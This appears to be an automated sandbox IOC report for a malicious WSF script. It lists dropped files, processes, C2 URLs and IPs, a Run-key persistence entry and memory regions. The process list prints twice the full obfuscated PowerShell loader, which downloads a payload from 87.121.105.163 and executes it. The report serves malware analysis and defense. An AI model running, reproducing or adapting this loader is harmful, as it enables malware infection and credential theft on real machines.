IOC Report
Ordine_doc_419024001904.wsf

loading gif

Files

File Path
Type
Category
Malicious
Ordine_doc_419024001904.wsf
XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhjghg51.z0h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s40pbzt4.vzk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd2ve3te.4le.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1idxvew.52z.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Roaming\Ballepresseres.Ine
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine_doc_419024001904.wsf"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5.0 8 0 )T ');Apalachicola $Karriererne158;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Offence = 1;$Rabbitriesnterimsstyre='Substrin';$Rabbitriesnterimsstyre+='g';Function adskilligt($Tegnedatabasen){$Bejig=$Tegnedatabasen.Length-$Offence;For($Rabbitries=1; $Rabbitries -lt $Bejig; $Rabbitries+=(2)){$Foundlings+=$Tegnedatabasen.$Rabbitriesnterimsstyre.Invoke($Rabbitries, $Offence);}$Foundlings;}function Apalachicola($Specieskbenes){&($milleardtedele) ($Specieskbenes);}$Folkedemokrati=adskilligt 'IMHoAzAi.l l,aO/ 5 .T0W S(,W,iUn,dgoBw,sH SNDTe .1H0P.G0,; RWPi nN6R4 ;N xM6T4K;, CrUv :R1M2G1 . 0C) BGVe,cEkBo,/,2 0,1,0 0E1L0 1, LFUiTr.enfko,xs/ 1A2U1Y.,0L ';$Godsterminalers=adskilligt 'hUPsMe rT-.AAgUe,n tG ';$Discredit=adskilligt 'Ghtt tJp :M/,/.8,7F. 1.2,1..U1 0 5S.M1A6P3C/ AKc a riiFa,t,r eA4S3,. cbhBm ';$Trlbundnes=adskilligt ' >M ';$milleardtedele=adskilligt 'TiUe.x ';$Phillipeener = adskilligt ' eScSh oS R%HaUp pEd ast aL%,\ B.aBl lHe pNrAeUsFs e r.e.s,. IfnNe K&E&M We.cAhSok .$ ';Apalachicola (adskilligt ' $MgRlFoUb aKl :MGMeBrCmKiEf.uUgBe.= (,cTmHdV /HcE .$UP hTiUl.lPiUpPe eSn.eDrA), ');Apalachicola (adskilligt 's$,g l,o b aKlv:IBAaFrFrFa m uTnMdpaZsP= $ D i sNcUr eVd iFtS.TsLpSlDiTtU( $,T.r lFb,uEn dQn eNs )S ');$Discredit=$Barramundas[0];Apalachicola (adskilligt 'p$ gEl.oKbTaNlF: o,vUerr gBe nKe.r a.l i z iUnRg =,N,eSw -.O b jTe cUtP .SFyus.tBevmD. N eEtG.sWBeFbOC.lKi eSnFt ');Apalachicola (adskilligt 'W$ o.v e.rLgMeMn.eUrJaGlDiPz iPn gP. H eNaGdAe,rDsA[ $PGEo d sPtAe.r,mBiMnUa lje,r sA]T=U$.F o.l kSeRd e,mGoOkFrPa tPi ');$Lordlily=adskilligt 'DoRv eArHgueRn.eSrKaSl iDzPiGn g .,DSoTwFn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHittK,I$,O z,oPn.iTc,), ';$Lordlily=$Germifuge[1]+$Lordlily;$Ozonic=$Germifuge[0];Apalachicola (adskilligt 'n$,g.l oSb a.la:Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WPEa tIh $MO z,oEn,iWc ) ');while (!$ferskvandene) {Apalachicola (adskilligt ' $ g lVo bOaHl :FcRoum.p l e,m e,nAt eIr.= $ tJr u eB ') ;Apalachicola $Lordlily;Apalachicola (adskilligt ' S.t a,rRtM- SDlLeNe.p 4T ');Apalachicola (adskilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e,= (TTSe.s t -LPTaLtHh C$SO zBo.nIiOcA) ') ;Apalachicola (adskilligt 'U$ g l o bHaKl : E n eMr,vSeTrTeS=R$BgSl oBb.a.lH:FT eOr m o m eMtEr.e.n.eF+,+ % $ BPa r r a m uBnAdNa s .ScKoBuCn ts ') ;$Discredit=$Barramundas[$Enervere];}Apalachicola (adskilligt 'u$SgOlWo,bCaNl : FTiTrTeFlTo c kLs ,=. UG eTtT-OC,o nRtle,nAt $FO,z o.nEiIcA ');Apalachicola (adskilligt ',$Cg l oAbpaClP: LHiPt tPe rHa t uMrIl i.s t e nE1U4N M=D [.S.y.s.tKe mr.,CIo,nTv e r,t,]F:D: F rAo.m.B a.sSeB6T4,SEt rSiSn g,( $MF iGrRePlio cSk sM)N ');Apalachicola (adskilligt 'G$Jg,lLoGbDaTl :sV eEr b iBg eVr a tHi n.gB B=A [RSWyEs.t e,ms. TLefx tC. EKn cNoOdEitnMg ],:K:KA SPC IUIT. G,eCt S tNrmi nPg (U$ LAiGtEt e rvaEt uMrRl i.sTt e ne1B4.)S ');Apalachicola (adskilligt 'N$.g.lMoVboaSl.: Kta r r i e r e.r nDeS1 5 8S= $OV eRrPbAi g e,r aQt,i,nHgN. sBuRb sHtMr iPnRgL( 3 3B6T3 9 4,,.2B5.0 8 0 )T ');Apalachicola $Karriererne158;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe
"C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe"
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
malicious
C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe
"C:\Program Files (x86)\NUuNNtrNamWTxkqzzGqVNSTAqlxtUxNEqmhzWeZQfrPwVAb\VkpUSAfAICCLXDmxnjqGHDByu.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ballepresseres.Ine && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.tyaer.com/gnbc/?URw=Rnl4c&BP-t5v1=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==
47.91.88.207
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.binMinnsTjeduelvalenza.it/ka/icjFpYDkBweqyeZ252.bin
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://www.oyoing.com/gnbc/?BP-t5v1=C1gai5pWl56CEUX9IJicnlurrW3FMhatoBDmIFOQ7zGon0Xv0KBemEgaA/rlfkMV
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.bin1
unknown
https://go.micro
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.binr
unknown
http://www.microsoft.co
unknown
http://www.oyoing.com/;a3
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://87.121.105.163/Acariatre43.chm
87.121.105.163
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.binllI
unknown
https://www.ecosia.org/newtab/
unknown
https://github.com/Pester/Pester
unknown
http://87.121.105.163/Acariatre43.chmXR
unknown
http://87.121.105.163/icjFpYDkBwd
unknown
http://87.121.105.163/Acariatre43.chmP
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://crl.m
unknown
https://aka.ms/pscore6lB
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.bin;
unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.bin
87.121.105.163
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.H
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 28 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.tyaer.com
47.91.88.207
malicious
www.megabet303.lol
unknown
malicious
www.oyoing.com
127.0.0.1

IPs

IP
Domain
Country
Malicious
47.91.88.207
www.tyaer.com
United States
malicious
87.121.105.163
unknown
Bulgaria
127.0.0.1
www.oyoing.com
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
3FZ4SBL
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
20A50000
unclassified section
page execute and read and write
malicious
8350000
direct allocation
page execute and read and write
malicious
5962000
trusted library allocation
page read and write
malicious
1AE40151000
trusted library allocation
page read and write
malicious
8C08000
direct allocation
page execute and read and write
malicious
26B0000
unkown
page execute and read and write
malicious
2F00000
trusted library allocation
page read and write
malicious
2900000
system
page execute and read and write
malicious
DC0000
system
page execute and read and write
malicious
2F40000
trusted library allocation
page read and write
malicious
2E40000
system
page execute and read and write
malicious
A88000
heap
page read and write
7ED0000
trusted library allocation
page read and write
24B0000
unkown
page read and write
1527679C000
heap
page read and write
7E2C000
heap
page read and write
1527490E000
heap
page read and write
4761000
heap
page read and write
1AE300E1000
trusted library allocation
page read and write
15274936000
heap
page read and write
15276C02000
heap
page read and write
15274937000
heap
page read and write
15274992000
heap
page read and write
72D0000
trusted library allocation
page read and write
4761000
heap
page read and write
15274975000
heap
page read and write
26AE9510000
trusted library allocation
page read and write
1AE2E380000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
1AE308A2000
trusted library allocation
page read and write
4370000
heap
page read and write
1AE2E47E000
heap
page read and write
7D7E000
heap
page read and write
7A3097C000
stack
page read and write
4761000
heap
page read and write
45DE000
stack
page read and write
15276779000
heap
page read and write
26AE99C4000
trusted library allocation
page read and write
15274951000
heap
page read and write
15274921000
heap
page read and write
152768C9000
heap
page read and write
1AE2E620000
trusted library allocation
page read and write
8390000
direct allocation
page read and write
2F8C000
heap
page read and write
4B83000
heap
page read and write
4761000
heap
page read and write
15274C55000
heap
page read and write
2DB0000
heap
page read and write
430000
unkown
page readonly
7FF8490D0000
trusted library allocation
page read and write
18EA5B50000
heap
page read and write
1AE403CB000
trusted library allocation
page read and write
7DA8000
heap
page read and write
4EEE000
stack
page read and write
4761000
heap
page read and write
4A00000
heap
page read and write
18EA5810000
heap
page read and write
5E0000
unkown
page readonly
420000
unkown
page readonly
D80000
unkown
page readonly
15274983000
heap
page read and write
517F000
stack
page read and write
94D000
trusted library allocation
page execute and read and write
4645000
heap
page execute and read and write
18EA5A10000
heap
page read and write
15274941000
heap
page read and write
1AE2E600000
trusted library allocation
page read and write
2D1C000
unkown
page read and write
DA7000
unkown
page readonly
26AE980E000
trusted library allocation
page read and write
513E000
stack
page read and write
4B9D000
heap
page read and write
6C44000
heap
page read and write
6F9C000
heap
page read and write
15276995000
heap
page read and write
152748A0000
heap
page read and write
7270000
trusted library allocation
page read and write
4B78000
heap
page read and write
287E000
stack
page read and write
7FF848E2B000
trusted library allocation
page read and write
26AE9821000
trusted library allocation
page read and write
2F6F000
unkown
page read and write
F88000
heap
page read and write
4E5C000
stack
page read and write
15274925000
heap
page read and write
8120000
heap
page read and write
910000
trusted library section
page read and write
843A000
heap
page read and write
2DB2000
heap
page read and write
206EB000
heap
page read and write
4761000
heap
page read and write
B50000
unkown
page readonly
15276799000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
2D00000
heap
page read and write
7D1F000
heap
page read and write
4C10000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
15276900000
heap
page read and write
8136000
heap
page read and write
26AE99BE000
trusted library allocation
page read and write
4761000
heap
page read and write
2DA8000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
15276997000
heap
page read and write
7D40000
trusted library allocation
page execute and read and write
6BAD000
stack
page read and write
1AE48420000
heap
page read and write
4B7A000
heap
page read and write
1AE31D3E000
trusted library allocation
page read and write
15274983000
heap
page read and write
7D65000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
7D22000
heap
page read and write
4761000
heap
page read and write
29A4000
heap
page read and write
4D60000
heap
page read and write
29A4000
heap
page read and write
725D000
stack
page read and write
6F0E000
heap
page read and write
D20000
unkown
page readonly
4761000
heap
page read and write
4C343FE000
stack
page read and write
6A90000
direct allocation
page read and write
7DE3000
heap
page read and write
719431D000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
800000
unkown
page readonly
7FF849100000
trusted library allocation
page read and write
2002E000
stack
page read and write
4A4E000
stack
page read and write
4B71000
heap
page read and write
8427000
heap
page read and write
5E9000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
8310000
trusted library allocation
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
15276914000
heap
page read and write
7FF848E12000
trusted library allocation
page read and write
7D8C000
heap
page read and write
459E000
stack
page read and write
1411000
unkown
page readonly
5AB000
stack
page read and write
834E000
stack
page read and write
715C000
stack
page read and write
7FF849010000
trusted library allocation
page read and write
15276C05000
heap
page read and write
7300000
trusted library allocation
page read and write
1AE2FE10000
trusted library allocation
page read and write
4E1A000
stack
page read and write
7EBF000
stack
page read and write
828D000
stack
page read and write
152768E8000
heap
page read and write
CA1000
unkown
page readonly
1527491B000
heap
page read and write
24E0000
heap
page read and write
18EA5B55000
heap
page read and write
4B51000
heap
page read and write
5719000
trusted library allocation
page read and write
2A53000
unkown
page read and write
2F70000
heap
page read and write
4761000
heap
page read and write
8330000
trusted library allocation
page read and write
22691000
unclassified section
page execute and read and write
F80000
heap
page read and write
7ED000
stack
page read and write
26AE7D30000
heap
page read and write
813E000
heap
page read and write
4D50000
heap
page read and write
44AE000
stack
page read and write
3250000
heap
page read and write
1AE2FF34000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
7D6A000
heap
page read and write
890000
heap
page read and write
4761000
heap
page read and write
31BF000
stack
page read and write
8430000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
29A4000
heap
page read and write
4761000
heap
page read and write
1527699D000
heap
page read and write
2E40000
direct allocation
page read and write
4358000
remote allocation
page execute and read and write
8320000
trusted library allocation
page read and write
DA7000
unkown
page readonly
2E40000
direct allocation
page read and write
4761000
heap
page read and write
2E5E000
stack
page read and write
15276770000
heap
page read and write
7D29000
heap
page read and write
4761000
heap
page read and write
7340000
trusted library allocation
page read and write
7D18000
heap
page read and write
C8E000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
1FF82B90000
heap
page read and write
2E5E000
unkown
page read and write
871000
unkown
page readonly
7F25000
trusted library allocation
page read and write
15274970000
heap
page read and write
4761000
heap
page read and write
1527698F000
heap
page read and write
4AB4000
heap
page read and write
4360000
trusted library allocation
page read and write
1080000
unkown
page readonly
2016B000
stack
page read and write
152768FD000
heap
page read and write
1AE308AF000
trusted library allocation
page read and write
B70000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
46A0000
heap
page execute and read and write
24F0000
unkown
page readonly
4761000
heap
page read and write
15276784000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
D90000
unkown
page readonly
CF0000
unkown
page read and write
7E40000
trusted library allocation
page read and write
27A92000
system
page read and write
7D50000
trusted library allocation
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
7DC9000
heap
page read and write
8380000
direct allocation
page read and write
800000
unkown
page readonly
1527497A000
heap
page read and write
15274949000
heap
page read and write
DA5000
unkown
page read and write
15276990000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
7A304F3000
stack
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
780000
unkown
page readonly
2C73000
heap
page read and write
7A3057D000
stack
page read and write
4761000
heap
page read and write
E54000
system
page execute and read and write
4761000
heap
page read and write
15274983000
heap
page read and write
1FC10000
direct allocation
page read and write
1FC70000
direct allocation
page read and write
6E5E000
stack
page read and write
15276330000
heap
page read and write
4B7E000
stack
page read and write
7FF849180000
trusted library allocation
page read and write
4761000
heap
page read and write
20700000
direct allocation
page execute and read and write
CD0000
heap
page read and write
2FAE000
stack
page read and write
1AE31843000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
4761000
heap
page read and write
29EE000
stack
page read and write
2A42000
unkown
page read and write
56B1000
trusted library allocation
page read and write
7DC4000
heap
page read and write
2C8E000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
56D9000
trusted library allocation
page read and write
BDB79FB000
stack
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
2EF0000
heap
page read and write
1AE400E1000
trusted library allocation
page read and write
4B00000
heap
page readonly
2D7C000
heap
page read and write
2D36000
heap
page read and write
780000
heap
page read and write
B70000
heap
page read and write
2950000
unkown
page readonly
1FC40000
direct allocation
page read and write
D9E000
unkown
page readonly
4761000
heap
page read and write
D20000
unkown
page readonly
880000
unkown
page read and write
152768CE000
heap
page read and write
15276914000
heap
page read and write
4761000
heap
page read and write
8102000
heap
page read and write
4770000
heap
page read and write
B80000
unkown
page readonly
15274933000
heap
page read and write
2CB0000
heap
page read and write
2D25000
heap
page read and write
152768C8000
heap
page read and write
4761000
heap
page read and write
F51000
unkown
page readonly
2D29000
heap
page read and write
15274983000
heap
page read and write
810000
heap
page read and write
711E000
stack
page read and write
1AE484FA000
heap
page read and write
D9E000
unkown
page readonly
4761000
heap
page read and write
29A4000
heap
page read and write
6F1B000
heap
page read and write
D90000
unkown
page readonly
15274968000
heap
page read and write
4761000
heap
page read and write
71DE000
stack
page read and write
843D000
heap
page read and write
4E02000
direct allocation
page execute and read and write
A80000
heap
page read and write
15274945000
heap
page read and write
4761000
heap
page read and write
15276C10000
heap
page read and write
28BD000
stack
page read and write
1AE48907000
heap
page read and write
6EEB000
heap
page read and write
4761000
heap
page read and write
2C68000
heap
page read and write
2006F000
stack
page read and write
4D1E000
stack
page read and write
790000
unkown
page readonly
2C73000
heap
page read and write
4761000
heap
page read and write
152768CD000
heap
page read and write
4761000
heap
page read and write
580E000
stack
page read and write
1FC50000
direct allocation
page read and write
5AC000
stack
page read and write
4761000
heap
page read and write
6EFE000
heap
page read and write
6B6E000
stack
page read and write
2EA0000
trusted library allocation
page read and write
1527684D000
heap
page read and write
6E9E000
stack
page read and write
38F1000
unkown
page execute and read and write
2E40000
direct allocation
page read and write
BDB91FE000
stack
page read and write
4761000
heap
page read and write
20391000
heap
page read and write
4761000
heap
page read and write
7A305FF000
stack
page read and write
4761000
heap
page read and write
152748CA000
heap
page read and write
85E000
stack
page read and write
817000
heap
page read and write
9608000
direct allocation
page execute and read and write
4C342F9000
stack
page read and write
7FF849160000
trusted library allocation
page read and write
15274983000
heap
page read and write
26AE7B2E000
system
page execute and read and write
26A4000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4D91000
direct allocation
page execute and read and write
A7C000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4C18000
heap
page read and write
6ED8000
trusted library allocation
page read and write
15274983000
heap
page read and write
801C000
stack
page read and write
959000
trusted library allocation
page read and write
6FDA000
heap
page read and write
152768C9000
heap
page read and write
6C2A000
stack
page read and write
1AE3054D000
trusted library allocation
page read and write
28F8000
heap
page read and write
975000
trusted library allocation
page execute and read and write
152748D1000
heap
page read and write
15274880000
heap
page read and write
F51000
unkown
page readonly
4E23000
unclassified section
page read and write
21291000
unclassified section
page execute and read and write
4BFE000
stack
page read and write
152748D0000
heap
page read and write
4707000
trusted library allocation
page read and write
1AE2E3B0000
heap
page read and write
4761000
heap
page read and write
4AB4000
heap
page read and write
2D32000
heap
page read and write
4F5F000
stack
page read and write
1AE4890D000
heap
page read and write
4761000
heap
page read and write
4761000
heap
page read and write
4F6B000
stack
page read and write
15274916000
heap
page read and write
4761000
heap
page read and write
15276774000
heap
page read and write
18EA5910000
heap
page read and write
72E0000
trusted library allocation
page read and write
4C349FD000
stack
page read and write
72A0000
trusted library allocation
page read and write
2038C000
stack
page read and write
15276996000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
524C000
stack
page read and write
4761000
heap
page read and write
15276914000
heap
page read and write
15274972000
heap
page read and write
4761000
heap
page read and write
5F0000
unkown
page readonly
1527699D000
heap
page read and write
4761000
heap
page read and write
15274922000
heap
page read and write
4761000
heap
page read and write
4C5E000
